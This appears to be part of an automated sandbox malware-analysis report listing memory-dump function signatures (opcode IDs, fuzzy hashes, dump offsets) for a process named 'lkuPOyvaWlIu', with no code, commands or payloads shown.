                                                            • Opcode ID: 4ab2d2f3a225e740a3ddd3805f0a1d87ce1eeeb2a239724f85d0dbb8eaa631b9
                                                            • Instruction ID: 6064dd230a2cb160a9d1ca355e224477aea144e456fcfe1340f4a7f667743215
                                                            • Opcode Fuzzy Hash: 4ab2d2f3a225e740a3ddd3805f0a1d87ce1eeeb2a239724f85d0dbb8eaa631b9
                                                            • Instruction Fuzzy Hash: 3B216772100204DFDB01DF98D9C0B26BF65FB98318F20C26DEC098B256C33AD546C7A2
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4121937421.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_186d000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89334a578214a072629de77bc33d4e6fba7488dfb98d3eb5746bc5de4a2ffd9a
                                                            • Instruction ID: 755c16f534712a4b96d9730d086899394af3ce836259f682012c8ba649fd53c8
                                                            • Opcode Fuzzy Hash: 89334a578214a072629de77bc33d4e6fba7488dfb98d3eb5746bc5de4a2ffd9a
                                                            • Instruction Fuzzy Hash: 3F213771604204DFCB11DF58C9C4B26BB69FB84318F20C66DE9898F352C77AD446CA62
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7fac0ba9353500846232ce7eaeeacfdfb54e2f8f1631405d55ca3fdcf2f29cc3
                                                            • Instruction ID: abffb4e4d9a5c3e6f61e41da5ea7f612345386a7e53b6a874fb2970e76b1dd28
                                                            • Opcode Fuzzy Hash: 7fac0ba9353500846232ce7eaeeacfdfb54e2f8f1631405d55ca3fdcf2f29cc3
                                                            • Instruction Fuzzy Hash: 58210E70D02219DBDB04CFA5D4487EDBBB2BF49304F50842AE859BB284EB744A4ACB51
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07d00342c37aa09a05a1483416a53f0787a861fb87716aac81b3d86b161a4c2d
                                                            • Instruction ID: 68d587a1ee7c9c59a20684ec12fbe1f3f005e18afcf05e2a1b3b246346b7e600
                                                            • Opcode Fuzzy Hash: 07d00342c37aa09a05a1483416a53f0787a861fb87716aac81b3d86b161a4c2d
                                                            • Instruction Fuzzy Hash: 3921FF357062098FCB019F28D488A6E3FA2FB65304F008465F80A8B755CB34CEA1DBA1
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4c837f1f7d5f60ba1c9a71dbf8169e4784730ca38120de05052a5d0f879216cb
                                                            • Instruction ID: b17b0c05271f1a0e932621a0e4ca00edf00083df1bd1855bc57f7af3f335b365
                                                            • Opcode Fuzzy Hash: 4c837f1f7d5f60ba1c9a71dbf8169e4784730ca38120de05052a5d0f879216cb
                                                            • Instruction Fuzzy Hash: 50216834E022489FCB15CFA5E594AEEBFB6EF49305F248069E411E63A1DB34D981DF20
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d7f388866eede28447a2fcac82c9b23fb110b068a79a54f8dd5181f9f1df7b43
                                                            • Instruction ID: f9b690fd7fe1c1fdcb1f394ea153cc32e70f78773992895d214b4bc23a37f808
                                                            • Opcode Fuzzy Hash: d7f388866eede28447a2fcac82c9b23fb110b068a79a54f8dd5181f9f1df7b43
                                                            • Instruction Fuzzy Hash: C2217F70A012099FCB45DFBDE98468DBFF1FF45300F1095A9D4549B36AEB345A85CB81
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec60cd300d6124aeb82d0b752f9fc5817e51d2a18a389200a4c7f23a60766142
                                                            • Instruction ID: 1f67c783af54fd5eee7793c4738d95339fc152b1ddaa0b7a381eb848c58d8f60
                                                            • Opcode Fuzzy Hash: ec60cd300d6124aeb82d0b752f9fc5817e51d2a18a389200a4c7f23a60766142
                                                            • Instruction Fuzzy Hash: 0801453470B2000FCBA4AB3CF51C46D7B96FB9124072044B9D506CBBA6EE64CC8AC360
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dcd4c9f8fb9fe3b5bc249b8ee1f55d6fad274a39040d9f19c16bf84c23ad0474
                                                            • Instruction ID: 88ce9861f43eaa3cd828960daafe6aef12d68f47ed053376df34e97f0e4e40d1
                                                            • Opcode Fuzzy Hash: dcd4c9f8fb9fe3b5bc249b8ee1f55d6fad274a39040d9f19c16bf84c23ad0474
                                                            • Instruction Fuzzy Hash: EC11A1353066119FCB159A2AE49893EBBA6FFD97913094479E90BCB750CF31DC02CB90
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3866a4ac3ee0e1cd4adc56212a5639bc8be6c7df437d6961401a0c736c46347c
                                                            • Instruction ID: 2698ac814e94841b9e1b9fc4c1033791b5458200ce69d5581538259a06c7c70c
                                                            • Opcode Fuzzy Hash: 3866a4ac3ee0e1cd4adc56212a5639bc8be6c7df437d6961401a0c736c46347c
                                                            • Instruction Fuzzy Hash: E721E378D062098FCB41EFA8D8455EEBFF5FF49200F10516AE805B7220EB315A85CFA1
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4121852365.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_185d000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                            • Instruction ID: bb2494b05cd299f35e8893e2f53f05c0bf3f5b29e7e5af130ce2db885794f2b1
                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                            • Instruction Fuzzy Hash: C911DF76404240CFCB02CF54D5C4B16BF61FB94318F24C6A9EC094B257C336D55ACBA2
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d1cebea0ab3c760da3c416fd42f516b7886858d3919d40d667eb6efeb084c01d
                                                            • Instruction ID: daeb17f12c275c46ff8d3fab756bfb6e7a0018fcce691985cecd4da3be958771
                                                            • Opcode Fuzzy Hash: d1cebea0ab3c760da3c416fd42f516b7886858d3919d40d667eb6efeb084c01d
                                                            • Instruction Fuzzy Hash: 93113A70E01109DFDB44DFADE58469EBBF2FB45300F10D5A9C4189B365EB345A858F81
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5286744f5831992aad6fb1795dcc3694266213e8055224e73e0a928e612c686d
                                                            • Instruction ID: 72678b65b1e206a981373b9b9e7e669a1d02a6a3f217cc445df00dcbff2bb412
                                                            • Opcode Fuzzy Hash: 5286744f5831992aad6fb1795dcc3694266213e8055224e73e0a928e612c686d
                                                            • Instruction Fuzzy Hash: 8A012D32B062546FCF168EA898505AE3FB7EBD9750F148016F906C7740DE75CD11DBA1
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4121937421.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_186d000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                            • Instruction ID: 760b50fe62b66d7a841c7a808dfe42d66a0c4d0fe8807f88384f64384beaedbf
                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                            • Instruction Fuzzy Hash: A711BB75604284CFDB12CF54D9C4B16FFA2FB84314F24C6AAD8898B252C33AD44ACB62
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5426d61147c70105ea69f15ece0b1ee974ffe54a4b6abed639ab9525dce34791
                                                            • Instruction ID: ee2cbe429a190edc87e6f9839bfceb547946e33249787d34118de33bece9df05
                                                            • Opcode Fuzzy Hash: 5426d61147c70105ea69f15ece0b1ee974ffe54a4b6abed639ab9525dce34791
                                                            • Instruction Fuzzy Hash: 2E116D74E0520ADFCB02CFA8E8449AEBBB5FF89300F508066D910A3351DB395E56DF91
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 84a972c5d6c3afd8083c1a7aea748dccb92b557e9e68e8b924bc32e0abd20f98
                                                            • Instruction ID: ad07a10e68bf5d5be9e617d281363dc597602c4841fc61fcd42d6a2b6225a178
                                                            • Opcode Fuzzy Hash: 84a972c5d6c3afd8083c1a7aea748dccb92b557e9e68e8b924bc32e0abd20f98
                                                            • Instruction Fuzzy Hash: 26F0F6353026104B87155A6E985CA2AB6DEFFC8E5131950BAE90AC7361EF20CC07C790
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c47f2a8a1f6f7811aa70b050a1d65e18a732b2d719b7c4b5e603fb5e2a51dd7c
                                                            • Instruction ID: 9d7878ef90dd39b7dc2d89ec88e02f44a2bd583f7e3d1ed0c95eaa4a0470820d
                                                            • Opcode Fuzzy Hash: c47f2a8a1f6f7811aa70b050a1d65e18a732b2d719b7c4b5e603fb5e2a51dd7c
                                                            • Instruction Fuzzy Hash: 17E0C232E2022A578B00EAA1DC004EFB738EE91620B804222D56433100EB306659C6A2
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e2d76d2e9d7f40e4f54c3c887345f2a1e68b98b972e82cf05ed83f4f2c0f7dd
                                                            • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                            • Opcode Fuzzy Hash: 0e2d76d2e9d7f40e4f54c3c887345f2a1e68b98b972e82cf05ed83f4f2c0f7dd
                                                            • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b0764beaf451176840faec9ac91539c56227175973fc1d5fd8206bd2e353c39a
                                                            • Instruction ID: 8855cecd9b5bc40436a27773e4932008b9a6bd7a926b2a12e197da747f0bef10
                                                            • Opcode Fuzzy Hash: b0764beaf451176840faec9ac91539c56227175973fc1d5fd8206bd2e353c39a
                                                            • Instruction Fuzzy Hash: 69D0673AB40018DFCF049F99E8808DDFBB6FB98321B148157F915A3261CA319925DF54
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c0577fbc3329800b8821d7d5e8b2c6003503b6e7e8167cd3432819779309c97
                                                            • Instruction ID: 9b081d991639d2b5f27f37326359aa1478fc36e6cfb3884b8cf28ae3d373f840
                                                            • Opcode Fuzzy Hash: 0c0577fbc3329800b8821d7d5e8b2c6003503b6e7e8167cd3432819779309c97
                                                            • Instruction Fuzzy Hash: 60C012302443094FC641E779FD595557BAEE6903407409520E4090665EDF78DDD94A90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \;^q$\;^q$\;^q$\;^q
                                                            • API String ID: 0-3001612457
                                                            • Opcode ID: b58bb7cd4d1cb3007c9c0517540c3df6d5dd1b78b46c6834fcd1f7d70d61c091
                                                            • Instruction ID: af342b2ff64acecb15e4295ac263446e21be77054351ce7ef09e4be4039ca6d6
                                                            • Opcode Fuzzy Hash: b58bb7cd4d1cb3007c9c0517540c3df6d5dd1b78b46c6834fcd1f7d70d61c091
                                                            • Instruction Fuzzy Hash: 8901DF31B431068FCB24CE2CE54892933EBBFA8A60725446AE446CF3B4DA31EC42C790